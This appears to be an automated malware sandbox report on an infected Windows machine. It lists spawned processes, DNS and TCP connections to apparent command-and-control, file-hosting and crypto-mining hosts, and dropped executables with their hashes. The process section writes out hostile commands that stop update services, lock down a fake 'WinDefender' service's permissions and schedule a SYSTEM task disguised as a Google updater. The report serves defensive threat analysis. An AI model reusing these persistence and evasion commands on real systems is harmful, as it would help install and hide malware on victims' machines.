\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\kyabiylzsfjo.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 126.22.238.8.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 onualituyrs.org udp
US 8.8.8.8:53 sumagulituyo.org udp
US 8.8.8.8:53 snukerukeutit.org udp
US 104.198.2.251:80 snukerukeutit.org tcp
US 8.8.8.8:53 lightseinsteniki.org udp
SG 34.143.166.163:80 lightseinsteniki.org tcp
US 8.8.8.8:53 251.2.198.104.in-addr.arpa udp
US 8.8.8.8:53 liuliuoumumy.org udp
US 8.8.8.8:53 163.166.143.34.in-addr.arpa udp
US 8.8.8.8:53 254.1.248.8.in-addr.arpa udp
SG 34.143.166.163:80 liuliuoumumy.org tcp
US 8.8.8.8:53 stualialuyastrelia.net udp
RU 91.215.85.17:80 stualialuyastrelia.net tcp
US 8.8.8.8:53 17.85.215.91.in-addr.arpa udp
RU 79.137.192.18:80 79.137.192.18 tcp
US 8.8.8.8:53 18.192.137.79.in-addr.arpa udp
US 8.8.8.8:53 alayyadcare.com udp
PS 213.6.54.58:443 alayyadcare.com tcp
US 8.8.8.8:53 api.2ip.ua udp
US 188.114.96.0:443 api.2ip.ua tcp
US 8.8.8.8:53 58.54.6.213.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 montereyclub.org udp
US 172.67.196.133:443 montereyclub.org tcp
US 8.8.8.8:53 133.196.67.172.in-addr.arpa udp
US 8.8.8.8:53 loveperry.org udp
US 172.67.213.185:443 loveperry.org tcp
US 8.8.8.8:53 185.213.67.172.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
RU 79.137.192.18:80 79.137.192.18 tcp
RU 91.215.85.17:80 stualialuyastrelia.net tcp
RU 85.209.11.85:41140 tcp
US 8.8.8.8:53 85.11.209.85.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 stalagmijesarl.com udp
US 95.214.26.31:80 stalagmijesarl.com tcp
BG 171.22.28.236:38306 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 31.26.214.95.in-addr.arpa udp
US 8.8.8.8:53 236.28.22.171.in-addr.arpa udp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 8.8.8.8:53 d689a5dd-80fc-40c3-846f-57f13a833a9b.uuid.alldatadump.org udp
US 8.8.8.8:53 10.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 server9.alldatadump.org udp
US 8.8.8.8:53 stun1.l.google.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
BG 185.82.216.108:443 server9.alldatadump.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
IN 172.253.121.127:19302 stun1.l.google.com udp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.97.0:443 walkinglate.com tcp
US 8.8.8.8:53 127.121.253.172.in-addr.arpa udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 108.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 217.192.94.141.in-addr.arpa udp
US 8.8.8.8:53 server9.alldatadump.org udp
BG 185.82.216.108:443 server9.alldatadump.org tcp

Files

memory/4392-1-0x0000000000800000-0x0000000000900000-memory.dmp

memory/4392-2-0x00000000007E0000-0x00000000007EB000-memory.dmp

memory/4392-3-0x0000000000400000-0x00000000007CD000-memory.dmp

memory/3148-4-0x0000000002990000-0x00000000029A6000-memory.dmp

memory/4392-8-0x00000000007E0000-0x00000000007EB000-memory.dmp

memory/4392-5-0x0000000000400000-0x00000000007CD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5F80.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

C:\Users\Admin\AppData\Local\Temp\5F80.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

C:\Users\Admin\AppData\Local\Temp\62BD.exe

MD5 73c0d14591b9438fd544c80ccee4fef1
SHA1 8eb8e501098dd00627bd7a63e0f01feb861eeac6
SHA256 ce66fdbd46087bff9a4114ed8b5268b1ba3aff912f3a9a9ce8374874092a8219
SHA512 d0c2a4baf90194865cb91cf825f16c9c546c18e1577331068a893cc09a42296b507fea01c4daad2a99d9a7e9e45453409fdb7e456b912517be4bc18c68bffc0f

C:\Users\Admin\AppData\Local\Temp\62BD.exe

MD5 73c0d14591b9438fd544c80ccee4fef1
SHA1 8eb8e501098dd00627bd7a63e0f01feb861eeac6
SHA256 ce66fdbd46087bff9a4114ed8b5268b1ba3aff912f3a9a9ce8374874092a8219
SHA512 d0c2a4baf90194865cb91cf825f16c9c546c18e1577331068a893cc09a42296b507fea01c4daad2a99d9a7e9e45453409fdb7e456b912517be4bc18c68bffc0f

memory/4508-23-0x00000000002A0000-0x00000000009DE000-memory.dmp

memory/4508-24-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-25-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-26-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-27-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-29-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-31-0x00000000773E4000-0x00000000773E6000-memory.dmp

memory/4508-33-0x0000000075230000-0x0000000075320000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\661A.dll

MD5 b22087ac0a2a7243e85d54a92654b666
SHA1 8e131975d080cf7ab254f8c9f52ec456ce6d03ad
SHA256 4cd083e241348bf34cc2fe65a443f49bb4ecbbece875f3b4739036a6ac3001c4
SHA512 70d9ea6624b432a3ad60d52f1096437509391c41c8db5ae0cc29050ad45b16d634d5485c65eb4d187eb8ced1958a7037e291650234e1be41489131dfe86a4dd1

memory/4508-36-0x0000000075230000-0x0000000075320000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\67FF.exe

MD5 276f4535df7de6a669a52a4e715f678c
SHA1 4ca1872fd68cf09060c344ecae344e5337d0f0fd
SHA256 e09d5baecda5561c71711ca31bf6b3a2c40d3e5d711c035f763a3456b7dd456f
SHA512 6316d85c668a9ac0eaf60047127237f8c95f54ea640318a80ed35a60ae899d2308dca6008f2ed71c23cf416e1a95486d5a265e2939a4b252f1e8f878f854dd89

C:\Users\Admin\AppData\Local\Temp\69E4.exe

MD5 5d2f4dced61a5ca942ddd8df3e2646d9
SHA1 87a53a110db93a85c2088424ff4d3feeb24ab82f
SHA256 911a05caef8cb0bbe510c0831c0f51dab5f5e9cc6bede193167bf13d630df618
SHA512 9770d4bab8ae0d0ae777c232e87f3a43375115faca33d1a8e3e459cd98e3987ddee73166a290c93a392ec007974505f965324463b4a24d9be0c051108b3e1bd6

C:\Users\Admin\AppData\Local\Temp\69E4.exe

MD5 5d2f4dced61a5ca942ddd8df3e2646d9
SHA1 87a53a110db93a85c2088424ff4d3feeb24ab82f
SHA256 911a05caef8cb0bbe510c0831c0f51dab5f5e9cc6bede193167bf13d630df618
SHA512 9770d4bab8ae0d0ae777c232e87f3a43375115faca33d1a8e3e459cd98e3987ddee73166a290c93a392ec007974505f965324463b4a24d9be0c051108b3e1bd6

memory/4508-30-0x0000000075230000-0x0000000075320000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\67FF.exe

MD5 276f4535df7de6a669a52a4e715f678c
SHA1 4ca1872fd68cf09060c344ecae344e5337d0f0fd
SHA256 e09d5baecda5561c71711ca31bf6b3a2c40d3e5d711c035f763a3456b7dd456f
SHA512 6316d85c668a9ac0eaf60047127237f8c95f54ea640318a80ed35a60ae899d2308dca6008f2ed71c23cf416e1a95486d5a265e2939a4b252f1e8f878f854dd89

C:\Users\Admin\AppData\Local\Temp\661A.dll

MD5 b22087ac0a2a7243e85d54a92654b666
SHA1 8e131975d080cf7ab254f8c9f52ec456ce6d03ad
SHA256 4cd083e241348bf34cc2fe65a443f49bb4ecbbece875f3b4739036a6ac3001c4
SHA512 70d9ea6624b432a3ad60d52f1096437509391c41c8db5ae0cc29050ad45b16d634d5485c65eb4d187eb8ced1958a7037e291650234e1be41489131dfe86a4dd1

memory/4528-47-0x0000000000770000-0x0000000000776000-memory.dmp

memory/4528-48-0x0000000010000000-0x00000000101D2000-memory.dmp

memory/4508-50-0x00000000002A0000-0x00000000009DE000-memory.dmp

memory/1392-52-0x00000000024E0000-0x0000000002575000-memory.dmp

memory/1392-54-0x0000000002580000-0x000000000269B000-memory.dmp

memory/4508-53-0x0000000005980000-0x0000000005F24000-memory.dmp

memory/4508-56-0x00000000053D0000-0x0000000005462000-memory.dmp

memory/4764-55-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4764-58-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5F80.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

memory/4508-59-0x0000000005610000-0x00000000056AC000-memory.dmp

memory/4764-60-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4508-67-0x00000000002A0000-0x00000000009DE000-memory.dmp

memory/4764-68-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\759D.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\759D.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/4508-69-0x0000000005570000-0x000000000557A000-memory.dmp

memory/4508-76-0x0000000075230000-0x0000000075320000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7C46.exe

MD5 1ce0912c72e8d0bfa728e6a229b04330
SHA1 071804aecef07ef6e2a43cacc9dbacf64a8a2232
SHA256 b508ccb2b80bb777fae721ed1d4b515129e2381ec79044c5bc0e0a10a6060273
SHA512 209a84c8aa4ab135d3983151057b1aea732f3700f3c98fc854bc524d219edf7ba5ed0e4ae6dcb0cf92e3444085219a515ab2cc402e5537c16b22387d7648073e

memory/3168-81-0x00000000023D0000-0x00000000023D9000-memory.dmp

memory/3168-79-0x00000000007D0000-0x00000000008D0000-memory.dmp

memory/4508-83-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-84-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-85-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-86-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-88-0x0000000075230000-0x0000000075320000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/3168-82-0x0000000000400000-0x00000000007CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7C46.exe

MD5 1ce0912c72e8d0bfa728e6a229b04330
SHA1 071804aecef07ef6e2a43cacc9dbacf64a8a2232
SHA256 b508ccb2b80bb777fae721ed1d4b515129e2381ec79044c5bc0e0a10a6060273
SHA512 209a84c8aa4ab135d3983151057b1aea732f3700f3c98fc854bc524d219edf7ba5ed0e4ae6dcb0cf92e3444085219a515ab2cc402e5537c16b22387d7648073e

memory/4508-96-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-97-0x0000000075230000-0x0000000075320000-memory.dmp

memory/408-102-0x0000000000970000-0x0000000000A70000-memory.dmp

memory/408-103-0x0000000000820000-0x000000000082B000-memory.dmp

memory/408-104-0x0000000000400000-0x00000000007CF000-memory.dmp

memory/3148-105-0x0000000002B90000-0x0000000002BA6000-memory.dmp

memory/3168-107-0x0000000000400000-0x00000000007CF000-memory.dmp

memory/4528-109-0x0000000010000000-0x00000000101D2000-memory.dmp

memory/4528-110-0x0000000000960000-0x0000000000A86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9349.exe

MD5 6c9efad2ba2589915879665a1a25a9ac
SHA1 8e94c81e51ad12f20c77da95883a4116a2c7a5c9
SHA256 55dc284e3cd4e026d83777e35f99d93037d20ffb6e2b3adb0f8ec95e8c232433
SHA512 61bb81a757cfb31ddacf7ae6e8b7627bf60a402e16a29dd6a1cd8aacc728529702dee3cf9758fdb6cb8a9e621e0cb8f213c793e913f6ba7a3df17c2db2a06a1c

memory/4344-116-0x0000000000CF0000-0x0000000000D5B000-memory.dmp

memory/4764-117-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4344-118-0x0000000000D60000-0x0000000000DD5000-memory.dmp

memory/4344-119-0x0000000000CF0000-0x0000000000D5B000-memory.dmp

memory/4528-120-0x0000000002560000-0x0000000002669000-memory.dmp

memory/4528-121-0x0000000002560000-0x0000000002669000-memory.dmp

memory/4528-123-0x0000000002560000-0x0000000002669000-memory.dmp

memory/4412-128-0x0000000000330000-0x000000000033C000-memory.dmp

memory/4412-130-0x0000000000340000-0x0000000000347000-memory.dmp

memory/4412-134-0x0000000000330000-0x000000000033C000-memory.dmp

memory/4528-141-0x0000000002560000-0x0000000002669000-memory.dmp

memory/4344-151-0x0000000000CF0000-0x0000000000D5B000-memory.dmp

memory/3956-153-0x0000000002A10000-0x0000000002E0A000-memory.dmp

memory/4508-154-0x00000000055D0000-0x00000000055EC000-memory.dmp

memory/3956-155-0x0000000002E10000-0x00000000036FB000-memory.dmp

memory/3956-156-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/4508-157-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-158-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-160-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-162-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-164-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-166-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-168-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-170-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-172-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-174-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-176-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-178-0x00000000055D0000-0x00000000055E5000-memory.dmp

memory/4508-180-0x00000000055D0000-0x00000000055E5000-memory.dmp

C:\Users\Admin\AppData\Local\dc7c59b8-8c2b-47e1-90e4-3d05406bc4c2\5F80.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

memory/1216-182-0x0000000000400000-0x000000000045A000-memory.dmp

memory/1216-186-0x0000000074510000-0x0000000074CC0000-memory.dmp

memory/4508-187-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-188-0x0000000005890000-0x00000000058A0000-memory.dmp

memory/4508-189-0x00000000002A0000-0x00000000009DE000-memory.dmp

memory/4764-191-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5F80.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

memory/1216-193-0x0000000008580000-0x0000000008B98000-memory.dmp

memory/1216-194-0x00000000076B0000-0x00000000076C2000-memory.dmp

memory/1216-195-0x00000000077E0000-0x00000000078EA000-memory.dmp

memory/1216-196-0x0000000007710000-0x000000000774C000-memory.dmp

memory/3956-197-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1216-198-0x0000000007770000-0x00000000077BC000-memory.dmp

memory/3956-200-0x0000000002E10000-0x00000000036FB000-memory.dmp

memory/3956-201-0x0000000002A10000-0x0000000002E0A000-memory.dmp

memory/1972-204-0x0000000002520000-0x00000000025B8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5F80.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

memory/3020-205-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3020-206-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3020-208-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1216-209-0x0000000007FE0000-0x0000000008046000-memory.dmp

memory/3956-210-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1216-212-0x0000000008F20000-0x0000000008F96000-memory.dmp

memory/1216-214-0x0000000008EE0000-0x0000000008EFE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tr5gvqvz.grd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3956-234-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/4300-236-0x0000000000400000-0x000000000043E000-memory.dmp

C:\Users\Admin\AppData\Roaming\aidihdd

MD5 5d2f4dced61a5ca942ddd8df3e2646d9
SHA1 87a53a110db93a85c2088424ff4d3feeb24ab82f
SHA256 911a05caef8cb0bbe510c0831c0f51dab5f5e9cc6bede193167bf13d630df618
SHA512 9770d4bab8ae0d0ae777c232e87f3a43375115faca33d1a8e3e459cd98e3987ddee73166a290c93a392ec007974505f965324463b4a24d9be0c051108b3e1bd6

memory/1704-273-0x0000000000CF0000-0x0000000000CFB000-memory.dmp

memory/3056-280-0x0000000000110000-0x000000000011F000-memory.dmp

memory/3260-289-0x0000000000CF0000-0x0000000000CF9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9349.exe

MD5 6c9efad2ba2589915879665a1a25a9ac
SHA1 8e94c81e51ad12f20c77da95883a4116a2c7a5c9
SHA256 55dc284e3cd4e026d83777e35f99d93037d20ffb6e2b3adb0f8ec95e8c232433
SHA512 61bb81a757cfb31ddacf7ae6e8b7627bf60a402e16a29dd6a1cd8aacc728529702dee3cf9758fdb6cb8a9e621e0cb8f213c793e913f6ba7a3df17c2db2a06a1c

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 38b644718080f19e7d636b8d3709c88a
SHA1 f6a4e61b4b3cef215cb550329d9ff9d8f21742e3
SHA256 70c8aa98511897e762d7764916b51afc1e6c8b4e418479c393ef546bdfc23328
SHA512 1feda87340545edc45b9a5c1a1eade79f2cff2044dede6358facfc74b811d574abece5962655dcd909472190bd90a4247519c74542b086e85faafcd70b0312d5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

MD5 4fd6b3a467056385abd8ed1f85da0fa2
SHA1 4c42cd69ac787622af8b0748cb72b76911f9ff76
SHA256 5e9fcb024a6b188bad3226ea736d4b95df2a5cc6b493e0fab951c5bc051fbfec
SHA512 525067ffa8c9ef372255eaf264114971590a64cd06302e33ef89d5465eded3a1579b8b79efa1b445e593fa2cd907ed3394b4f1193c0ed63157ed5f06d4889289

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 6738d1984cdb9f3d4136a1dd7c2bb45e
SHA1 1b202fa2af82b1f911275cc51e0fcc0911f8c640
SHA256 b46154e81bff60e4009cb82dd443803d636ea916ddc4e2a63d5f9e5479b348c4
SHA512 a09f1e1e74a376dac5b8f468bc8bf568950b65f3b616410a804751bd49ca676b57e3785d749b9b0cd52406d5490637e95f6b680ec10041bca4a7faf281e17c0b

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 6eac15739187cb08cacb633e135bf399
SHA1 00aa8b552395a936f4d3a008887f642905aa90e6
SHA256 85a9bb156b26b663ae389297208c4465843b1e2aaa3f0011f27068b5823f5df6
SHA512 407726a7b90f13cefea78e6890580a008ed54c509fa7f0b785a0bb359cb7b014c699713693c5c7be890cab5bf0cdeafdc5469ef156e38b9a763346dbf08cda08

C:\Windows\rss\csrss.exe

MD5 6c9efad2ba2589915879665a1a25a9ac
SHA1 8e94c81e51ad12f20c77da95883a4116a2c7a5c9
SHA256 55dc284e3cd4e026d83777e35f99d93037d20ffb6e2b3adb0f8ec95e8c232433
SHA512 61bb81a757cfb31ddacf7ae6e8b7627bf60a402e16a29dd6a1cd8aacc728529702dee3cf9758fdb6cb8a9e621e0cb8f213c793e913f6ba7a3df17c2db2a06a1c

C:\Users\Admin\AppData\Local\Temp\kyabiylzsfjo.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 38b644718080f19e7d636b8d3709c88a
SHA1 f6a4e61b4b3cef215cb550329d9ff9d8f21742e3
SHA256 70c8aa98511897e762d7764916b51afc1e6c8b4e418479c393ef546bdfc23328
SHA512 1feda87340545edc45b9a5c1a1eade79f2cff2044dede6358facfc74b811d574abece5962655dcd909472190bd90a4247519c74542b086e85faafcd70b0312d5

C:\Program Files\Google\Chrome\updater.exe

MD5 38b644718080f19e7d636b8d3709c88a
SHA1 f6a4e61b4b3cef215cb550329d9ff9d8f21742e3
SHA256 70c8aa98511897e762d7764916b51afc1e6c8b4e418479c393ef546bdfc23328
